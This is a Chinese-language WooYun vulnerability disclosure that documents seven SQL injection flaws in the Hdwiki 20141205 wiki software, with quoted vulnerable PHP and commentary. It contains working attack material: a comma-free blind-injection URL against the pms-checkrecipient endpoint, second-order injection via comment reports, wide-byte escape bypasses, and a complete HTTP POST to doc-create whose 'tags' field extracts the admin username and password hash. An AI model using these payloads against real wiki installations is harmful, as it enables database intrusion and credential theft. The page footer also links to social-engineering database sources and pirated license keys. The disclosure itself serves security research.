Hdwiki (20141205) 存在7处SQL注入漏洞(含之前处理不当安全的漏洞)
- 发表于
- WooYun漏洞库
漏洞概要
缺陷编号:WooYun-2014-088004
漏洞标题:Hdwiki (20141205) 存在7处SQL注入漏洞(含之前处理不当安全的漏洞)
相关厂商:互动在线(北京)科技有限公司
漏洞作者:′雨。
提交时间:2014-12-22 19:26
公开时间:2015-04-02 10:23
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
Tags标签:
漏洞详情
披露状态:
2014-12-22: 细节已通知厂商并且等待厂商处理中
2014-12-27: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息)
2015-02-20: 细节向核心白帽子及相关领域专家公开
2015-03-02: 细节向普通白帽子公开
2015-03-12: 细节向实习白帽子公开
2015-04-02: 细节向公众公开
简要描述:
看到更新了,有几个老洞还没修复 也随便放到这里面来说了。
详细说明:
0x01 在control/comment.php 中
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 |
function doreport(){$usernames=array();<br> $id=intval($this->post['id']) ? $this->post['id'] : 0;<br> $report=trim(htmlspecialchars(WIKI_CHARSET==GBK?string::hiconv($this->post['report']):$this->post['report']));<br> if(empty($id)||empty($report)){<br> $this->message(-1,'',2);<br> }<br> $users=$_ENV["user"]->get_users('groupid',4);<br> if(!(bool)$users){<br> $this->message(-2,'',2);<br> }else{<br> foreach($users as $user){<br> $usernames[]=$user['username'];<br> }<br> }<br> $sendto=join(',',$usernames);<br> $subject=$this->view->lang['commentReportObj'];<br> if($this->user['uid']=='0'){<br> $from=$this->ip;<br> }else{<br> $from=$this->user['username'];<br> }$comment=$this->db->fetch_by_field('comment','id',$id);// 这里出了个裤。if(!(bool)$comment){<br> $this->message(-1,'',2);<br> }$doc=$this->db->fetch_by_field('doc','did',$comment['did']);<br> $doc['title'] =htmlspecialchars(stripslashes($doc['title']));<br> $report=$this->view->lang['commentCom'].$this->view->lang['commentUser'].$comment['author'].'<br/>'<br> .$this->view->lang['commentCom'].$this->view->lang['commentTime'].$this->date($comment['time'])."<br/>"<br> .$this->view->lang['commentId'].$comment['id'].'<br/>'.$this->view->lang['commentsDocTitle'].$doc['title']."<br/>"<br> .$this->view->lang['commentContent'].$comment['comment'].'<br/>'<br> .$this->view->lang['commentReportReason'].$report;//这里把出库的$comment写到了$report中$sendarray = array(<br> 'sendto'=>$sendto,<br> 'subject'=>$subject,<br> 'content'=>$report,//带入数组<br> 'isdraft'=>1,<br> 'user'=>$this->user<br> );<br> $_ENV['pms']->send_ownmessage($sendarray); |
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
function send_ownmessage($sendarray){<br> $pmsresult = true;<br> $isdraft = ($sendarray['isdraft'] === 'on')? 1 : 0;<br> $userinfo = $this->check_recipient($sendarray['sendto'],1);<br> $num = count($userinfo);<br> if($num > 0){<br> $pmsquery = "INSERT INTO ".DB_TABLEPRE."pms (`from`,`fromid`,`drafts`,`toid`,`to`,`subject`,`message`,`time`,`new`) VALUES ";<br> for($i=0; $i<$num; $i++){<br> $pmsquery .= "('".$sendarray['user']['username']."','".$sendarray['user']['uid']."','".$isdraft."','".$userinfo[$i]['uid']."','".$userinfo[$i]['username']."','".$sendarray['subject']."','".$sendarray['content']."','".$this->base->time."',1),"; //无过滤 又直接带入到了insert当中<br> }<br> $pmsquery = substr($pmsquery,0,-1) . ';';<br> $pmsresult = $this->db->query($pmsquery);<br> }<br> return $pmsresult;<br> } |
|
1 2 3 4 |
词条的评论(共1条)返回词条<br> xiaoyu 时间:12-19 00:47test'//我们随便找一个词条 然后我们自己先去评论一条 这里评论了test'<br> // 然后点击举报 看看执行的语句 INSERT INTO wiki_pms (`from`,`fromid`,`drafts`,`toid`,`to`,`subject`,`message`,`time`,`new`) VALUES ('xiaoyu','2','0','1','admin','评论举报专用','评论作者:xiaoyu<br/>评论时间:12-19 00:47<br/>评论ID:8<br/>评论词条名:xiaoyuxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxasd<br/>评论内容:test'<br/>举报原因teet','1418921320',1)<br> 评论内容:test' 这里出库了。 |
这里的怎么回显让我纠结了很久。INSERT INTO wiki_pms (from,fromid,drafts,toid,to,subject,message,time,new) VALUES ('xiaoyu','2','0','1','admin','评论举报专用','评论作者:xiaoyu<br/>评论时间:12-19 00:47<br/>评论ID:8<br/>评论词条名:xiaoyuxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxasd<br/>评论内容:test'<br/>举报原因teet','1418921320',1)这里会把我们的message的内容回显出来,在发送邮件的那里。 这里是发给了管理员 但是我们的发件箱可以看到。 后面还剩了一个time 和 new 都是不会显示出来的而且hdwiki没mysql error 所以不会报错。二次注入的话盲注会很麻烦,所以像办法直接出数据。INSERT INTO wiki_pms (from,fromid,drafts,toid,to,subject,message,time,new) VALUES ('xiaoyu','2','0','1','admin','评论举报专用','评论作者:xiaoyu<br/>评论时间:12-19 00:47<br/>评论ID:8<br/>评论词条名:a<br/>评论内容:test'+123,1,1)#<br/>举报原因teet','1418921320',1)评论内容:test'+123 mysql +不能连接字符串 只能加一个数字。 加字符是加不进去的一开始是想的hex 但是hex 也会有字符。 然后就是想的把16进制转换成10进制10进制就没数字了撒 然后完整的就是
举报后 进入自己的发件箱标题 收件人 时间评论举报专用 admin 01-01 08:001919905652转发 删除 关闭可以看到这样的发件的。 看 1919905652 这个转16进制 得726f6f74 然后加上0x726f6f74再把HEX编码回来 得root 这样一次截取的字符不能太多 太多了数字太大会报错。0x02 control/doc.php
|
1 2 3 4 5 6 7 8 9 10 11 12 13 |
function docheckrecipient(){<br> $sendto = $this->post['sendto'];<br> if (WIKI_CHARSET == 'GBK'){<br> $sendto = string::hiconv($sendto,'GBK','UTF-8',1);//转码<br> }<br> $send = explode(',',$sendto);<br> if(count($send)>10){<br> $this->message($this->view->lang['fullsend'],'',2);<br> }<br> $checkreturn = $_ENV['pms']->check_recipient($sendto,0);<br> $message = ($checkreturn === true)? 'OK' : ($checkreturn.' '.$this->view->lang['loginTip3']);<br> $this->message($message,'',2);<br> } |
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 |
function hiconv($str,$to='',$from='',$force=false) {<br> if (empty($str)) return $str;<br> if(!preg_match( '/[\x80-\xff]/', $str)) return $str; // is contain chinese char<br> if(empty($to)){<br> if ('utf-8' == strtolower(WIKI_CHARSET)){<br> return $str;<br> }<br> $to=WIKI_CHARSET;<br> }<br> if(empty($from)){<br> $from = ('gbk'==strtolower($to)) ? 'utf-8':'gbk';<br> }<br> $to=strtolower($to);<br> $from=strtolower($from);<br> //$isutf8=preg_match( '/^([\x00-\x7f]|[\xc0-\xdf][\x80-\xbf]|[\xe0-\xef][\x80-\xbf]{2}|[\xf0-\xf7][\x80-\xbf]{3})+$/', $str );<br> $re = strlen($str) > 6 ? '/([\xe0-\xef][\x80-\xbf]{2}){2}/' : '/[\xe0-\xef][\x80-\xbf]{2}/';<br> $isutf8 = preg_match($re, $str);//$force = (substr($to, 0, 3) == 'utf') ? true : $force;if(!$force && $isutf8 && $to=='utf-8' ) return $str;//当force为1的时候才不会return 这里的点force刚好为1<br> if(!$force && !$isutf8 && $to=='gbk' ) return $str;if (function_exists('iconv')){<br> $str = iconv($from, $to, $str);//转码 宽字节 绕过转义符<br> }else{<br> require_once(HDWIKI_ROOT.'/lib/Chinese.class.php');<br> $ch = new chinese($from,$to);<br> if('utf-8'==$from){<br> $str = addslashes($ch->convert(stripslashes($str)));<br> }else{<br> $str = $ch->convert($str);<br> }<br> }<br> return $str;<br> } |
|
1 2 3 4 5 6 7 8 9 10 |
function check_recipient($sendto, $type){<br> $userinfos = array();<br> $send = array_unique(explode(',', $sendto));//这里把逗号替换了 注定不能用逗号了。<br> sort($send);<br> $num = count($send);<br> $sendto = str_replace(",", "','", $sendto);<br> $query = $this->db->query("SELECT username,uid FROM ".DB_TABLEPRE."user WHERE username IN ('$sendto')");<br> if($this->db->num_rows($query) == $num && $type != 1){<br> return true;<br> } |
盲注之。http://web/dan/hdwiki//index.php?pms-checkrecipientsendto=a%E9%8C%A6%27) or CASE WHEN(substr((select username from wiki_user where uid=1) from 1 for 1) in (char(97))) THEN (1) ELSE (0) end limit 1#//bypass逗号的盲注语句。97对应的是a 当第一位是a的时候 返回ok
当不对应时 直接错误。 写个脚本直接跑 很简单的判断。0x03 control/doc.php中
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 |
function dochangename(){<br> $ajaxtitle = trim($this->post['newname']);<br> if(string::hstrtoupper(WIKI_CHARSET)=='GBK'){<br> $ajaxtitle=string::hiconv($ajaxtitle,'gbk','utf-8','true');//force为1 转码 绕过转义符<br> }<br> $title=string::substring(string::stripscript($_ENV['doc']->replace_danger_word(trim($ajaxtitle))),0,80);<br> if(@!is_numeric($this->post['did'])){<br> $this->message("-1","",2);<br> }elseif($ajaxtitle!=string::stripscript($ajaxtitle)){<br> $this->message("-3","",2);<br> }elseif(!$title){<br> $this->message("-4","",2);<br> }elseif(@(bool)$this->db->fetch_by_field('doc','title',$title)){//这里带入查询<br> $this->message("-2","",2);<br> }elseif(@(bool)$this->db->fetch_by_field('synonym','srctitle',$title)){<br> $this->message("-5","",2);<br> }elseif($_ENV['doc']->change_name($this->post['did'],$title)){<br> $_ENV['synonym']->synonym_change_doc($this->post['did'],$title);<br> // ֪ͨ<br> if(1 == $this->setting['cloud_search']) {<br> // ༭ ֪ͨ<br> $_ENV['search']->cloud_change(array('dids'=>$this->post['did'],'mode'=>'2'));<br> } |
这个跟上个差不多 就不多说了。0x04 control/edition.php
|
1 2 3 4 5 6 7 8 |
function doremove(){$did=isset($this->post['did'])?$this->post['did']:$this->get[2];<br> $eids=isset($this->post['eid'])?$this->post['eid']:array($this->get[3]);//post来<br> foreach($eids as $eid){<br> if(!is_numeric($eid)&&!is_numeric($did)){<br> //这里判断是不是数字 如果是不是数字的话 直接返回错误了。 但是这里有个问题是 当$eids为数组的时候才会进foreach 如果不是数组 那么就不会进这个判断 这里我们直接提交一个字符串<br> $this->message($this->view->lang['parameterError'],'BACK',0);<br> }<br> }$result=$_ENV['doc']->remove_edition($eids, $did);//带入查询 |
|
1 2 3 4 5 6 7 8 |
function remove_edition($eid, $did=0){<br> if(is_array($eid)){<br> $eid=implode(",",$eid);<br> }<br> $sql="INSERT INTO ".DB_TABLEPRE."recycle (type,keyword,content,file,adminid,admin,dateline) values ";<br> $query=$this->db->query("SELECT * FROM ".DB_TABLEPRE."edition WHERE eid IN ($eid)");//这里eid没单引号<br> $delete_count = array();<br> while($edition=$this->db->fetch_array($query)){ |
0x05 依旧control/edition.php
|
1 2 3 4 5 6 |
function doexcellent(){<br> foreach(@$this->post['eid'] as $eid){<br> if(!is_numeric($eid)){//一样的逻辑错误<br> $this->message($this->view->lang['parameterError'],'BACK',0);<br> }<br> }$result=$_ENV['doc']->set_excellent_edition($this->post['eid']); |
|
1 2 3 4 5 6 7 |
function set_excellent_edition($eid,$type=1){<br> if(is_array($eid)){<br> $eid=implode(",",$eid);<br> }<br> $type=(bool)$type?1:0;<br> $this->db->query("UPDATE ".DB_TABLEPRE."edition SET excellent=$type WHERE eid IN ($eid)");//依旧没单引号 可注入<br> return true; |
跟上面个差不多 不多说了。0x06 control/doc.php中
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 |
function docreate(){<br> if(4 != $this->user['groupid'] && ($this->time-$this->user['regtime'] < $this->setting['forbidden_edit_time']*60)){<br> $this->message($this->view->lang['editTimeLimit1'].$this->setting['forbidden_edit_time'].$this->view->lang['editTimeLimit2'],'BACK',0);<br> }if($this->setting['verify_doc'] == -1) { //首次编辑审核<br> if($this->setting['max_newdocs'] != 0 && $this->user['newdocs'] >= $this->setting['max_newdocs']) {<br> $this->message('您的首次可创建或编辑词条数的数量已达最大值,请等待管理员审核', 'BACK', 0);<br> }<br> }<br> if($this->setting['checkcode']!=3 && $this->setting['doc_verification_create_code'] && strtolower($this->post['code'])!=$_ENV['user']->get_code()){<br> $this->message($this->view->lang['codeError'],'BACK',0);<br> }<br> if(@trim($this->post['content'])==''[email protected]($this->post['title'])==''){<br> $this->message($this->view->lang['contentIsNull'],'BACK',0);<br> }<br> $doc['title']=string::substring(string::stripscript($_ENV['doc']->replace_danger_word(trim($this->post['title']))),0,80);//这里关键点 对POST来的截取了字符<br> 这里大概的意思是 假如说一段代码截取4个字符 那么我们就提交一个aaa' 然后转义成aaa\' 截取字符后就是aaa\ 这里同理$_doc=$this->db->fetch_by_field('doc','title',$doc['title']);<br> if((bool)$_doc && !empty($_doc['content'])){<br> $this->message($this->view->lang['createDocTip5'],'BACK',0);<br> }<br> if(!(bool)$_ENV['category']->vilid_category($this->post['category'])){<br> $this->message($this->view->lang['categoryNotExist'],'BACK',0);<br> }<br> if((bool)$this->post['summary']){<br> $doc['summary']=trim(strip_tags($_ENV['doc']->replace_danger_word($this->post['summary'])));<br> }<br> $doc['did']=intval($this->post['did']);<br> $doc['letter']=string::getfirstletter($this->post['title']);<br> $doc['category']=$this->post['category'];//$doc['tags']=$_ENV['doc']->jointags($this->post['tags']);<br> $doc['tags']=$this->post['tags'];<br> $doc['tags']=$_ENV['doc']->replace_danger_word($doc['tags']);<br> $doc['tags'] = htmlspecialchars(string::stripscript($doc['tags']));$doc['content'] = $_ENV['doc']->replace_danger_word($this->post['content']);<br> $doc['content'] = preg_replace('/(<embed.*?(?:allowscriptaccess)=)\\\?([\'"]?)(\w*?)\\\?\2(.*?>)/i','$1$2never$2$4',$doc['content']);//将embed标签中的allowscriptaccess属性设置为never<br> $doc['content'] = preg_replace('/(<embed(?:(?!allowscriptaccess).)+?)(>)/i','$1 allowscriptaccess="never" $2',$doc['content']);//将embed标签中如果不存在allowscriptaccess属性则添加属性并设为never$doc['content'] = addslashes(string::stripscript(stripslashes($doc['content'])));<br> $doc['content'] = $this->setting['auto_picture']?$_ENV['doc']->auto_picture($doc['content'],$doc['did']):$doc['content'];$doc['summary'] = trim(strip_tags($_ENV['doc']->replace_danger_word($doc['summary'])));//去除敏感词<br> $doc['summary'] = (bool)$doc['summary']?$doc['summary']:$doc['content'];<br> $doc['summary'] = trim(string::convercharacter(string::substring(strip_tags($doc['summary']),0,100)));//去除换行符截断字符串<br> $doc['summary'] = htmlspecialchars(addslashes(stripslashes(string::stripscript(strip_tags($doc['summary'])))));//去除特殊字符 去除javascript代码$doc['images']=util::getimagesnum($doc['content']);<br> $doc['time']=$this->time;<br> $doc['words']=string::hstrlen($doc['content']);<br> $doc['visible']=$this->setting['verify_doc'] != 0 ? '0' : '1';if(strpos($this->user['regulars'], 'doc-immunity') === false && 4 != $this->user['groupid']) {<br> if(!$_ENV['doc']->check_submit_interval($this->user['uid'])) {<br> if($this->setting['save_spam']) {<br> $doc['visible'] = 0;<br> } else {<br> $this->message(sprintf($this->view->lang['submit_interval_msg'], $this->setting['submit_min_interval']),"BACK",0);<br> }<br> }<br> if(!$_ENV['doc']->check_eng_pcnt($doc['content']) || !$_ENV['doc']->check_extlink_pcnt($doc['content'])) {<br> if($this->setting['save_spam']) {<br> $doc['visible'] = 0;<br> } else {<br> $this->message($this->view->lang['spam_msg'],"BACK",0);<br> }<br> }<br> }<br> if(strpos($this->user['regulars'], 'doc-immunity') !== false |4 == $this->user['groupid'] || !$this->setting['verify_doc'] ||$this->setting['verify_doc'] == -1 && $this->user['newdocs'] == -1)){<br> $doc['visible'] = 1;<br> }if($this->setting['verify_doc'] == -1) { //首次编辑审核<br> if($this->user['newdocs'] != -1) {<br> $_ENV['user']->update_newdocs($this->user['uid'], +1);<br> }<br> }if($doc['visible'] == 1){<br> $_ENV['user']->add_credit($this->user['uid'],'doc-create',$this->setting['credit_create'],$this->setting['coin_create']);<br> }<br> /*foreach($this->post['tags'] as $search_tags){<br> $doc['search_tags'] .=string::convert_to_unicode($search_tags).";";<br> }*/$did=$_ENV['doc']->add_doc($doc);//这里这里 带入入库入库了。<br> $_ENV['user']->update_field('creates',$this->user['creates']+1,$this->user['uid']);<code>function add_doc($doc) {<br> $editions = ($this->base->setting['base_createdoc']==1)?1:0;<br> $doc['title'] = trim($doc['title']);if ($doc['did']){$this->db->query("REPLACE INTO ".DB_TABLEPRE."doc<br> (did,letter,title,tag ,summary ,content,author,authorid,time,lastedit,lasteditor,lasteditorid,visible,editions)<br> VALUES (".$doc['did'].",'".$doc['letter']."','".$doc['title']."','".$doc['tags']."','".$doc['summary']."','".$doc['content']."',<br> '".$this->base->user['username']."','".$this->base->user['uid']."',<br> ".$doc['time'].",".$doc['time'].",'".$this->base->user['username']."','".$this->base->user['uid']."','".$doc['visible']."',$editions)");<br> $did = $doc['did'];<br> $this->db->query("DELETE FROM ".DB_TABLEPRE."autosave WHERE AND uid=".$this->base->user['uid']);<br> }else{<br> $this->db->query("INSERT INTO ".DB_TABLEPRE."doc<br> (letter,title,tag ,summary ,content,author,authorid,time,lastedit,lasteditor,lasteditorid,visible,editions)<br> VALUES ('".$doc['letter']."','".$doc['title']."','".$doc['tags']."','".$doc['summary']."','".$doc['content']."',<br> '".$this->base->user['username']."','".$this->base->user['uid']."',<br> ".$doc['time'].",".$doc['time'].",'".$this->base->user['username']."','".$this->base->user['uid']."','".$doc['visible']."',$editions)");<br> $did = $this->db->insert_id();<br> $this->add_doc_category($did, $doc['category']);<br> $this->db->query("DELETE FROM ".DB_TABLEPRE."autosave WHERE AND uid=".$this->base->user['uid']);<br> }<br> if($this->base->setting['base_createdoc']==1){<br> $this->db->query("INSERT INTO ".DB_TABLEPRE."edition<br> (did,author,authorid,time,ip,title,tag,summary,content,words,images )<br> VALUES ($did,'".$this->base->user['username']."','".$this->base->user['uid']."',<br> '".$doc['time']."','".$this->base->ip."','".$doc['title']."','".$doc['tags']."','".$doc['summary']."','".$doc['content']."','".$doc['words']."','".$doc['images']."')");<br> }<br> return $did;<br> } |
$doc['title']."','".$doc['tags'] 刚好这截取字符的 后面跟的是一个post来的 那么就可以注入了。后面看了下 这个洞竟然被提交过了 http://**.**.**.**/bugs/wooyun-2010-081667但是我觉得xxx牛给的利用很不完美啊。 至少在我这个版本/* 是不成功的在php中/* 能直接注释掉后面的东西 但是mysql很多版本都需要在后面接*/才能注释掉一开始我也在这语句上纠结了很久 我们先来看一下这个语句REPLACE INTO wiki_doc(did,letter,title,tag ,summary ,content,author,authorid,time,lastedit,lasteditor,lasteditorid,visible,editions)VALUES (56,'x','xiaoyuxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxasd\',',user(),1,1,1,1,1,1,1,1#','asd','<p>asd<br /></p>','xiaoyu','2',1418925356,1418925356,'xiaoyu','2','1',0)是这样的 他换行了。 就是因为这个换行 让人蛋疼。首先我们知道# -- 都是单行注释 这个多行注释/* 在mysql中又需要接*/后面的我们是不可控的 所以也没办法利用 这里我们还是得来接我们的单行注释一共14个column 换行了后的有8个column 所以我们前面需要接6个column56,'x','xiaoyuxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxasd\',' 这里是三个 所以我们构造一下56,'x','xiaoyuxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxasd\',',1,1,1 这样就是6个了。 在1后面还需要构造一个, 为的就是和下面换行了的连接起来 然后再注释掉这一行后面的那么最终语句就是REPLACE INTO wiki_doc(did,letter,title,tag ,summary ,content,author,authorid,time,lastedit,lasteditor,lasteditorid,visible,editions)VALUES (56,'x','xiaoyuxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxasd\',',concat(user(),0x23,version()),user(),(select concat(username,0x2c,password) from wiki_user where uid=1),#','asd','<p>asd<br /></p>','xiaoyu','2',1418925356,1418925356,'xiaoyu','2','1',0)
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 |
POST /dan/hdwiki/index.php?doc-create HTTP/1.1<br> Host: web<br> User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0<br> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br> Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3<br> Accept-Encoding: gzip, deflate<br> Proxy-Connection: keep-alive<br> Referer: http://web/dan/hdwiki/index.php?doc-create<br> Cookie: ECS[visit_times]=6; themeIndexTom=2; KT-GUID=KT-C3DD75C5698EA55255357D6602C6136C; KT-ADMIN=admin; 17cplastvisit=1418373539; 17cplastactivity=0; __utma=242480388.119574638.1418373557.1418373557.1418373557.1; __utmz=242480388.1418373557.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); hd_sid=7YD9xP; hd_auth=b37eKa64aWjTOOSABPRfh3bnxRh50jO7TfArgwNT1RGI1HzWq11B2XSpwCG%2BKaHUwNFm9NRHXZ2nR5JUNbvW<br> Content-Type: multipart/form-data; boundary=---------------------------41184676334<br> Content-Length: 1534-----------------------------41184676334<br> Content-Disposition: form-data; name="did"56<br> -----------------------------41184676334<br> Content-Disposition: form-data; name="section_id"-----------------------------41184676334<br> Content-Disposition: form-data; name="create_submit"1<br> -----------------------------41184676334<br> Content-Disposition: form-data; name="title"xiaoyuxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxasd\<br> -----------------------------41184676334<br> Content-Disposition: form-data; name="category"3<br> -----------------------------41184676334<br> Content-Disposition: form-data; name="content"<p>asd<br /></p><br> -----------------------------41184676334<br> Content-Disposition: form-data; name="letter"asd<br> -----------------------------41184676334<br> Content-Disposition: form-data; name="tags",concat(user(),0x23,version()),user(),(select concat(username,0x2c,password) from wiki_user where uid=1),#<br> -----------------------------41184676334<br> Content-Disposition: form-data; name="code"-----------------------------41184676334<br> Content-Disposition: form-data; name="publishsubmit"·à2?<br> -----------------------------41184676334--<br> Content-Disposition: form-data; name="tags",user(),user(),user(),user(),1,1,1,1,1,1,1)#<br> -----------------------------491299511942<br> Content-Disposition: form-data; name="code"-----------------------------491299511942<br> Content-Disposition: form-data; name="publishsubmit"·à2?<br> -----------------------------491299511942-- |
成功执行。
直接出数据。0x07 control/pms.php中
|
1 |
function doblacklist(){if(isset($this->post['blacklist'])){$blacklist = htmlspecialchars(string::stripscript($this->post['blacklist']));if(empty($blacklist)){$result = $_ENV['pms']->remove_blacklist($this->user['uid']);}else{$result = $_ENV['pms']->add_blacklist($blacklist,$this->user['uid']); |
|
1 |
function add_blacklist($blacklist,$uid){return($this->db->query("REPLACE INTO ".DB_TABLEPRE."blacklist (uid,blacklist) VALUES('$uid','$blacklist')"));}//入库 |
|
1 |
function dobox(){$this->get[3] = empty($this->get[3]) ? NULL : $this->get[3];$page = max(1,isset($this->get[4]) ? $this->get[4] : $this->get[3]);$num = isset($this->setting['list_prepage'])?$this->setting['list_prepage']:20;$start_limit = ($page - 1) * $num;$count = $_ENV['pms']->get_totalpms($this->user['uid'], $this->get[2]);//出库 |
|
1 |
function get_blacklist($uid){$user = $this->db->fetch_first("SELECT blacklist FROM ".DB_TABLEPRE."blacklist WHERE uid='".$uid."'");return $user['blacklist']; |
|
1 |
$blackuser = str_replace(",","','",$blacklist);if($group){$sqladd = ($group == 'owner') ? 'AND og=0' : 'AND og=1';}$query = "SELECT COUNT(*) num FROM ".DB_TABLEPRE."pms WHERE toid='$uid' AND delstatus!=2 AND drafts!=1 $sqladd AND `from` |
这个老洞也没修复 http://**.**.**.**/bugs/wooyun-2010-067410 试试修复了把。
漏洞证明:
修复方案:
无尽的过滤。
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-04-0210:23
厂商回复:
最新状态:
暂无
评价
-
2010-01-01 00:00 bitcoin 白帽子 | Rank:290 漏洞数:36)
牛!
2010-01-01 00:00 猪猪侠 白帽子 | Rank:2932 漏洞数:249)大礼包
2010-01-01 00:00 D_in 白帽子 | Rank:311 漏洞数:26)屌
2010-01-01 00:00 泳少 白帽子 | Rank:158 漏洞数:20)猪猪侠也来了?
2010-01-01 00:00 草榴社区 白帽子 | Rank:85 漏洞数:14)楼主居然没拆成7个...业界良心.
2010-01-01 00:00 胡小树 白帽子 Rank:13 漏洞数:3)你关注的白帽子 ′雨。 发表了漏洞 Hdwiki20141205)
2010-01-01 00:00 px1624 白帽子 | Rank:963 漏洞数:126)@互动在线(北京)科技有限公司 xwiki是不是你们?
2010-01-01 00:00 geekfree 白帽子 | Rank:9 漏洞数:2)怎么绕过防御的??
2010-01-01 00:00 sin 白帽子 | Rank:20 漏洞数:1)审计哪家强....
2010-01-01 00:00 ′雨。 白帽子 | Rank:1086 漏洞数:88)看最近的状态 要被忽略了 到时候补点rank吧, [email protected] @疯狗
2010-01-01 00:00 ′雨。 白帽子 | Rank:1086 漏洞数:88)@geekfree get才有 post没,
2010-01-01 00:00 geekfree 白帽子 | Rank:9 漏洞数:2)噢,原来如此,get的这种方式能绕过吗?
2010-01-01 00:00 geekfree 白帽子 | Rank:9 漏洞数:2)@′雨。 get的这种方式能绕过吗
2010-01-01 00:00 ′雨。 白帽子 | Rank:1086 漏洞数:88)@geekfree 结合具体的点把。 不过我感觉一般不行了。
2010-01-01 00:00 geekfree 白帽子 | Rank:9 漏洞数:2)@′雨。 能加个q不:1963103788
2010-01-01 00:00 Smilent 白帽子 | Rank:36 漏洞数:3)get post都做了防御的啊,求姿势
2010-01-01 00:00 huotoo 白帽子 | Rank:22 漏洞数:3)这些基本之前都发过了 只有一个 是没发的
2010-01-01 00:00 roker 白帽子 | Rank:138 漏洞数:14)? 1w : 4k
2010-01-01 00:00 ′雨。 白帽子 | Rank:1086 漏洞数:88)@roker 我要无视你这个傻逼。-.-
2010-01-01 00:00 roker 白帽子 | Rank:138 漏洞数:14)@′雨。 我要分手费 🙁
2010-01-01 00:00 牛肉包子 白帽子 | Rank:190 漏洞数:17)@roker @′雨。 天天秀恩爱。
原文连接:Hdwiki (20141205) 存在7处SQL注入漏洞(含之前处理不当安全的漏洞) 所有媒体,可在保留署名、原文连接的情况下转载,若非则不得使用我方内容。- N/A
- 2020 Google镜像大全,谷歌镜像网址
- BT磁力搜索引擎大全
- Javaweb架构分析安全之万户ezoffice全版本通杀上传GETSHELL
- 东方网景某严重安全漏洞(可导致上万网站沦陷/域名劫持/FTP服务安全/集群安全等可受到影响)
- 暗网是什么?如何进入暗网?
- 最新ESET NOD32 License Key/激活码/许可证密钥/用户名密码
- No Access-Control-Allow-Origin 跨域错误解决
- 社工库源码大全(持续更新)
- 谷歌识图,以图搜图
- this channel is blocked because it was used:Telegram群组/频道屏蔽解决方法
- 【透明互联网】社工库 Social Engineering Data
- 怎么用图片搜索番号?
- 一个绕过Google谷歌验证码(reCAPTCHA)的方法
- 9部有史以来最好的黑客电影
- 手机BT/种子下载,手机磁力链下载软件整理
扫码分享
验证:体验盒子扫码分享
打赏零钱
